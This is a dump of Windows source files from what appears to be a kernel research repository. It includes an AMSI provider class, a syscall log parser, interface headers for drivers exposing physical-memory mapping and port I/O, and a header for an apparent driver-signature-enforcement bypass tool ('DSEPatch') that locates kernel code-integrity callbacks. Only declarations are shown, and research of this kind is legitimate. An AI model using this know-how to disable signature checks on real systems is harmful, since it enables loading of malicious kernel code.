23 | public CComCoClass,
24 | public IAntimalwareProvider
25 | {
26 | public:
27 | CAmsiProvider()
28 | {
29 | }
30 |
31 | DECLARE_REGISTRY_RESOURCEID(IDR_AMSIPROVIDER)
32 |
33 |
34 | BEGIN_COM_MAP(CAmsiProvider)
35 | COM_INTERFACE_ENTRY(IAntimalwareProvider)
36 | END_COM_MAP()
37 |
38 |
39 |
40 | DECLARE_PROTECT_FINAL_CONSTRUCT()
41 |
42 | HRESULT FinalConstruct()
43 | {
44 | return S_OK;
45 | }
46 |
47 | void FinalRelease()
48 | {
49 | }
50 |
51 | public:
52 |
53 | HRESULT STDMETHODCALLTYPE Scan(
54 | _In_ IAmsiStream *stream,
55 | _Out_ AMSI_RESULT *result);
56 |
57 | void STDMETHODCALLTYPE CloseSession(
58 | _In_ ULONGLONG session);
59 |
60 | HRESULT STDMETHODCALLTYPE DisplayName(
61 | _Outptr_ LPWSTR *displayName);
62 |
63 | };
64 |
65 | OBJECT_ENTRY_AUTO(__uuidof(AmsiProvider), CAmsiProvider)
66 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsDll.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007-2009 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
12 | //-----------------------------------------------------------------------------
13 | //
14 | // Version Information
15 | //
16 | //-----------------------------------------------------------------------------
17 |
18 | #define OLS_MAJOR_VERSION 1
19 | #define OLS_MINOR_VERSION 3
20 | #define OLS_REVISION 0
21 | #define OLS_RELESE 18
22 |
23 | #define OLS_VERSION ((OLS_MAJOR_VERSION << 24) | (OLS_MINOR_VERSION << 16) |\
24 | (OLS_REVISION << 8) | OLS_RELESE)
25 |
26 | //-----------------------------------------------------------------------------
27 | //
28 | // Defines
29 | //
30 | //-----------------------------------------------------------------------------
31 |
32 | #define OLS_DRIVER_FILE_NAME_WIN_9X _T("WinRing0.vxd")
33 | #define OLS_DRIVER_FILE_NAME_WIN_NT _T("WinRing0.sys")
34 | #define OLS_DRIVER_FILE_NAME_WIN_NT_X64 _T("WinRing0x64.sys")
35 | #define OLS_DRIVER_FILE_NAME_WIN_NT_IA64 _T("WinRing0ia64.sys") // Reserved
36 |
37 | //-----------------------------------------------------------------------------
38 | //
39 | // Prototypes
40 | //
41 | //-----------------------------------------------------------------------------
42 |
43 | DWORD Initialize();
44 | void Deinitialize();
45 | DWORD InitDriverInfo();
46 |
47 | BOOL OpenDriver();
48 | BOOL LoadDriver(TCHAR *DriverFileName, TCHAR *DriverId);
49 | BOOL UnloadDriver(TCHAR *DriverId);
50 | DWORD GetRefCount();
51 |
52 | BOOL IsNT();
53 | BOOL IsWow64();
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/srvany2.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {193b68bc-13ea-43ca-9f81-6a739b38bb42}
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 | minirtl
26 |
27 |
28 | minirtl
29 |
30 |
31 | minirtl
32 |
33 |
34 | minirtl
35 |
36 |
37 |
38 |
39 | Header Files
40 |
41 |
42 | Header Files
43 |
44 |
45 | minirtl
46 |
47 |
48 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Drv/winio_nt.h:
--------------------------------------------------------------------------------
1 | #ifndef WINIONT_H
2 | #define WINIONT_H
3 |
4 | // Define the various device type values. Note that values used by Microsoft
5 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use
6 | // by customers.
7 |
8 | #define FILE_DEVICE_WINIO 0x00008010
9 |
10 | // Macro definition for defining IOCTL and FSCTL function control codes.
11 | // Note that function codes 0-2047 are reserved for Microsoft Corporation,
12 | // and 2048-4095 are reserved for customers.
13 |
14 | #define WINIO_IOCTL_INDEX 0x810
15 |
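16 | // Define our own private IOCTLs. Every code below is declared FILE_ANY_ACCESS, so the I/O manager does not check the access granted on the handle; who may issue these requests depends on the device object's security descriptor and on validation inside the driver.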
17 |
18 | #define IOCTL_WINIO_MAPPHYSTOLIN CTL_CODE(FILE_DEVICE_WINIO, \
19 | WINIO_IOCTL_INDEX, \
20 | METHOD_BUFFERED, \
21 | FILE_ANY_ACCESS)
22 |
23 | #define IOCTL_WINIO_UNMAPPHYSADDR CTL_CODE(FILE_DEVICE_WINIO, \
24 | WINIO_IOCTL_INDEX + 1, \
25 | METHOD_BUFFERED, \
26 | FILE_ANY_ACCESS)
27 |
28 | #define IOCTL_WINIO_ENABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \
29 | WINIO_IOCTL_INDEX + 2, \
30 | METHOD_BUFFERED, \
31 | FILE_ANY_ACCESS)
32 |
33 | #define IOCTL_WINIO_DISABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \
34 | WINIO_IOCTL_INDEX + 3, \
35 | METHOD_BUFFERED, \
36 | FILE_ANY_ACCESS)
37 |
38 | #define IOCTL_WINIO_READPORT CTL_CODE(FILE_DEVICE_WINIO, \
39 | WINIO_IOCTL_INDEX + 4, \
40 | METHOD_BUFFERED, \
41 | FILE_ANY_ACCESS)
42 |
43 | #define IOCTL_WINIO_WRITEPORT CTL_CODE(FILE_DEVICE_WINIO, \
44 | WINIO_IOCTL_INDEX + 5, \
45 | METHOD_BUFFERED, \
46 | FILE_ANY_ACCESS)
47 |
48 | #pragma pack(push)
49 | #pragma pack(1)
50 |
51 | struct tagPhysStruct
52 | {
53 | DWORD64 dwPhysMemSizeInBytes;
54 | DWORD64 pvPhysAddress;
55 | DWORD64 PhysicalMemoryHandle;
56 | DWORD64 pvPhysMemLin;
57 | DWORD64 pvPhysSection;
58 | };
59 |
60 | struct tagPortStruct
61 | {
62 | USHORT wPortAddr;
63 | ULONG dwPortVal;
64 | UCHAR bSize;
65 | };
66 |
67 | #pragma pack(pop)
68 |
69 | #endif
70 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/MAPMEM.H:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) 1993 Microsoft Corporation
4 |
5 | Module Name:
6 |
7 | mapmem.h
8 |
9 | Abstract:
10 |
11 |
12 | Environment:
13 |
14 | kernel & User mode
15 |
16 | Notes:
17 |
18 |
19 | Revision History:
20 |
21 | --*/
22 |
23 |
24 | //
25 | // Define the various device type values. Note that values used by Microsoft
26 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use
27 | // by customers.
28 | //
29 |
30 | #define FILE_DEVICE_MAPMEM 0x00008000
31 |
32 |
33 |
34 | //
35 | // Macro definition for defining IOCTL and FSCTL function control codes. Note
36 | // that function codes 0-2047 are reserved for Microsoft Corporation, and
37 | // 2048-4095 are reserved for customers.
38 | //
39 |
40 | #define MAPMEM_IOCTL_INDEX 0x800
41 |
42 |
43 | //
44 | // Define our own private IOCTL
45 | //
46 |
47 | #define IOCTL_MAPMEM_MAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM , \
48 | MAPMEM_IOCTL_INDEX, \
49 | METHOD_BUFFERED, \
50 | FILE_ANY_ACCESS)
51 |
52 | #define IOCTL_MAPMEM_UNMAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM, \
53 | MAPMEM_IOCTL_INDEX+1,\
54 | METHOD_BUFFERED, \
55 | FILE_ANY_ACCESS)
56 |
57 |
58 |
59 |
60 | //
61 | // Our user mode app will pass an initialized structure like this
62 | // down to the kernel mode driver
63 | //
64 |
65 | typedef struct
66 | {
67 | INTERFACE_TYPE InterfaceType; // Isa, Eisa, etc....
68 | ULONG BusNumber; // Bus number
69 | PHYSICAL_ADDRESS BusAddress; // Bus-relative address
70 | ULONG AddressSpace; // 0 is memory, 1 is I/O
71 | ULONG Length; // Length of section to map
72 |
73 | } PHYSICAL_MEMORY_INFO, *PPHYSICAL_MEMORY_INFO;
74 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/w32parguments.h:
--------------------------------------------------------------------------------
1 | /* MACHINE GENERATED, DO NOT EDIT */
2 | UCHAR W32pServiceArgumentTable[] = {
3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1,
4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2,
5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0,
6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5,
7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2,
8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1,
9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1,
10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1,
11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3,
12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3,
13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3,
14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3,
15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2,
16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 };
17 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/w32parguments_checked.h:
--------------------------------------------------------------------------------
1 | /* MACHINE GENERATED, DO NOT EDIT */
2 | UCHAR W32pServiceArgumentTable[] = {
3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1,
4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2,
5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0,
6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5,
7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2,
8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1,
9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1,
10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1,
11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3,
12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3,
13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3,
14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3,
15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2,
16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 2, 2, 1, 1, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 };
17 |
--------------------------------------------------------------------------------
/source/StripDebug/StripDebug.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {a2258c3e-0c10-4091-bb15-4cfbc255d0c5}
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | minirtl
29 |
30 |
31 | minirtl
32 |
33 |
34 | minirtl
35 |
36 |
37 | minirtl
38 |
39 |
40 |
41 |
42 | Header Files
43 |
44 |
45 | Header Files
46 |
47 |
48 | Header Files
49 |
50 |
51 | minirtl
52 |
53 |
54 | Header Files
55 |
56 |
57 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan_i.c:
--------------------------------------------------------------------------------
1 |
2 |
3 | /* this ALWAYS GENERATED file contains the IIDs and CLSIDs */
4 |
5 | /* link this file in with the server and any clients */
6 |
7 |
8 | /* File created by MIDL compiler version 8.01.0622 */
9 | /* at Mon Jan 18 19:14:07 2038
10 | */
11 | /* Compiler settings for AmsiScan.idl:
12 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
13 | protocol : all , ms_ext, c_ext, robust
14 | error checks: allocation ref bounds_check enum stub_data
15 | VC __declspec() decoration level:
16 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
17 | DECLSPEC_UUID(), MIDL_INTERFACE()
18 | */
19 | /* @@MIDL_FILE_HEADING( ) */
20 |
21 |
22 |
23 | #ifdef __cplusplus
24 | extern "C"{
25 | #endif
26 |
27 |
28 | #include
29 | #include
30 |
31 | #ifdef _MIDL_USE_GUIDDEF_
32 |
33 | #ifndef INITGUID
34 | #define INITGUID
35 | #include
36 | #undef INITGUID
37 | #else
38 | #include
39 | #endif
40 |
41 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \
42 | DEFINE_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8)
43 |
44 | #else // !_MIDL_USE_GUIDDEF_
45 |
46 | #ifndef __IID_DEFINED__
47 | #define __IID_DEFINED__
48 |
49 | typedef struct _IID
50 | {
51 | unsigned long x;
52 | unsigned short s1;
53 | unsigned short s2;
54 | unsigned char c[8];
55 | } IID;
56 |
57 | #endif // __IID_DEFINED__
58 |
59 | #ifndef CLSID_DEFINED
60 | #define CLSID_DEFINED
61 | typedef IID CLSID;
62 | #endif // CLSID_DEFINED
63 |
64 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \
65 | EXTERN_C __declspec(selectany) const type name = {l,w1,w2,{b1,b2,b3,b4,b5,b6,b7,b8}}
66 |
67 | #endif // !_MIDL_USE_GUIDDEF_
68 |
69 | MIDL_DEFINE_GUID(IID, IID_IAmsiProvider,0x05025dfe,0x70d5,0x4b61,0xa5,0x5a,0xaa,0x21,0x58,0x5d,0x4c,0xb2);
70 |
71 |
72 | MIDL_DEFINE_GUID(IID, LIBID_AmsiScanLib,0x508c88ef,0xca97,0x4107,0xa0,0x22,0x60,0x25,0x89,0x2e,0xf1,0x92);
73 |
74 |
75 | MIDL_DEFINE_GUID(CLSID, CLSID_AmsiProvider,0x1c0643e1,0x5b0a,0x4420,0x9b,0x76,0x0d,0xe9,0x26,0x4b,0x4c,0x59);
76 |
77 | #undef MIDL_DEFINE_GUID
78 |
79 | #ifdef __cplusplus
80 | }
81 | #endif
82 |
83 |
84 |
85 |
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.cpp:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * NTCALL64 Log File Parser
4 | *
5 | * Parses log files generated by NTCALL64 -log switch (binary format).
6 | *
7 | *******************************************************************************/
8 |
9 | #define _CRT_SECURE_NO_WARNINGS
10 | #include
11 | #include
12 | #include
13 |
14 | #define NC64_LOG_MAX_ARGS 16
15 |
16 | #pragma pack(push, 1)
17 | typedef struct _NC64_SYSCALL_LOG_ENTRY {
18 | ULONG SyscallNumber;
19 | ULONG ArgCount;
20 | ULONG_PTR Arguments[NC64_LOG_MAX_ARGS];
21 | } NC64_SYSCALL_LOG_ENTRY, * PNC64_SYSCALL_LOG_ENTRY;
22 | #pragma pack(pop)
23 |
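// Prints one log record: its index, the syscall number (decimal and hex),
// the recorded argument count, and each stored argument.
//
// entry - record read from the log file; its fields are untrusted file data.
// index - zero-based position of the record in the file.
//
// ArgCount is taken from the file, so it is clamped to NC64_LOG_MAX_ARGS
// before it is used to index Arguments; an out-of-range count is reported on
// stderr so a malformed or tampered record does not pass unnoticed.
void print_entry(const NC64_SYSCALL_LOG_ENTRY* entry, size_t index) {
    printf("Entry %zu:\n", index);
    printf(" SyscallNumber: %lu (0x%lX)\n", entry->SyscallNumber, entry->SyscallNumber);
    printf(" Argument Count: %lu\n", entry->ArgCount);

    ULONG shown = entry->ArgCount;
    if (shown > NC64_LOG_MAX_ARGS) {
        fprintf(stderr,
            "Warning: entry %zu declares %lu arguments; only the first %d are stored in a record.\n",
            index, entry->ArgCount, NC64_LOG_MAX_ARGS);
        shown = NC64_LOG_MAX_ARGS;
    }

    for (ULONG i = 0; i < shown; ++i) {
#ifdef _WIN64
        printf(" Arg[%02lu]: 0x%016llX\n", i, (unsigned long long)entry->Arguments[i]);
#else
        printf(" Arg[%02lu]: 0x%08lX\n", i, (unsigned long)entry->Arguments[i]);
#endif
    }
    printf("\n");
}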
37 |
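// Entry point: reads the binary log named on the command line record by
// record and prints each one with print_entry.
//
// Returns 1 on a usage error or when the file cannot be opened, 0 otherwise.
// A trailing partial record or a read error produces a warning on stderr.
int main(int argc, char* argv[])
{
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        return 1;
    }

    const char* filename = argv[1];
    FILE* f = NULL;
    errno_t err = fopen_s(&f, filename, "rb");
    if (err != 0 || f == NULL) {
        fprintf(stderr, "Error opening log file: %s\n", filename);
        return 1;
    }

    NC64_SYSCALL_LOG_ENTRY entry;
    const size_t entry_size = sizeof(NC64_SYSCALL_LOG_ENTRY);
    size_t index = 0;
    size_t got = 0;

    // Keep the byte count of the last read so a short final record can be
    // told apart from a clean end of file.
    while ((got = fread(&entry, 1, entry_size, f)) == entry_size) {
        print_entry(&entry, index);
        ++index;
    }

    // A truncated file ends with 0 < got < entry_size and the EOF flag set,
    // so testing feof() alone would miss it; check the leftover bytes and
    // the stream error flag instead.
    if (got != 0 || ferror(f)) {
        fprintf(stderr, "Warning: incomplete or corrupt log file detected at entry %zu.\n", index);
    }

    fclose(f);
    printf("Done. %zu entries read.\n", index);
    return 0;
}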
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/sup.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019
4 | *
5 | * TITLE: SUP.H
6 | *
7 | * VERSION: 1.00
8 | *
9 | * DATE: 23 Jan 2019
10 | *
11 | * Common header file for the program support routines.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
/*
 * Callback type: receives one object-directory entry plus an opaque caller
 * parameter and returns an NTSTATUS.
 * NOTE(review): the enumerator that invokes it is not declared in this header.
 */
typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);

/*
 * Wide-character buffer pointer paired with a size.
 * NOTE(review): whether BufferSize counts bytes or WCHARs is not stated
 * here - confirm against the code that fills this structure.
 */
typedef struct _OBJSCANPARAM {
    PWSTR Buffer;
    ULONG BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
27 |
/*
 * Prototypes of the support routines. Only the signatures are visible in
 * this header; the notes below describe what the parameter lists show and
 * mark everything else as an assumption.
 */

/*
 * Copy between two buffers, taking both the destination capacity (ccdest)
 * and the source length (ccsrc).
 * NOTE(review): behaviour when ccsrc > ccdest is defined by the
 * implementation - confirm it truncates rather than overruns.
 */
void supCopyMemory(
    _Inout_ void *dest,
    _In_ size_t ccdest,
    _In_ const void *src,
    _In_ size_t ccsrc);

/*
 * Returns a pointer for the requested system information class.
 * NOTE(review): presumably a heap buffer the caller must release - confirm.
 */
PVOID supGetSystemInfo(
    _In_ SYSTEM_INFORMATION_CLASS InfoClass);

/* bRestore selects the direction (backup vs. restore); details are in the implementation. */
BOOL supBackupVBoxDrv(
    _In_ BOOL bRestore);

/*
 * Writes BufferSize bytes from Buffer to lpFileName.
 * NOTE(review): the meaning of the DWORD result (bytes written vs. error
 * code) is not visible here.
 */
DWORD supWriteBufferToFile(
    _In_ LPWSTR lpFileName,
    _In_ PVOID Buffer,
    _In_ DWORD BufferSize);

/* Tests for a named object under the given object-manager root directory. */
BOOL supIsObjectExists(
    _In_ LPWSTR RootDirectory,
    _In_ LPWSTR ObjectName);

/* Takes an ANSI module name; the result is returned as an address-sized integer. */
ULONG_PTR supGetModuleBaseByName(
    _In_ LPSTR ModuleName);

ULONG_PTR supGetNtOsBase(
    VOID);

BOOL supIsVBoxInstalled(
    VOID);

/*
 * Looks up a section by name inside the image at DllBase and reports its
 * size through SectionSize. SectionNameLength is passed separately, so the
 * name need not be NUL-terminated.
 * NOTE(review): DllBase is parsed as an image; presumably the caller
 * guarantees it is a valid mapped module.
 */
PVOID supLookupImageSectionByName(
    _In_ CHAR* SectionName,
    _In_ ULONG SectionNameLength,
    _In_ PVOID DllBase,
    _Out_ PULONG SectionSize);

/*
 * Takes the OS build number together with the kernel image size, its base
 * address and a module handle for it.
 * NOTE(review): a build-number-dependent search is implied by the
 * parameters; callers should treat a zero result as "not found" - confirm.
 */
ULONG_PTR supFindCiCallbacks(
    _In_ ULONG NtBuildNumber,
    _In_ ULONG NtOsSize,
    _In_ ULONG_PTR NtOsBase,
    _In_ HMODULE hNtOs);

/*
 * Byte-pattern search over Buffer.
 * CONST PBYTE makes the pointer itself const, not the bytes it points to,
 * so the signature does not promise that Buffer or Pattern stay unmodified.
 */
PVOID supFindPattern(
    _In_ CONST PBYTE Buffer,
    _In_ SIZE_T BufferSize,
    _In_ CONST PBYTE Pattern,
    _In_ SIZE_T PatternSize);

/*
 * NOTE(review): no upper bound is passed, so the implementation must decide
 * on its own where the function ends - confirm it cannot read past the
 * mapped image.
 */
ULONG supSizeOfProc(
    _In_ PBYTE FunctionPtr);

/*
 * Resolves FunctionName using two addresses for the same kernel module.
 * NOTE(review): presumably KernelImage is a local mapping and KernelBase
 * the address the result is rebased to - confirm.
 */
ULONG_PTR supGetProcAddress(
    _In_ ULONG_PTR KernelBase,
    _In_ ULONG_PTR KernelImage,
    _In_ LPCSTR FunctionName);

/*
 * True when GetFileAttributes succeeds for the path, so directories count
 * as "existing" too. (DWORD)-1 is the value of INVALID_FILE_ATTRIBUTES.
 * The name matches the shlwapi PathFileExists API; including both in one
 * translation unit would collide.
 */
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)
85 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
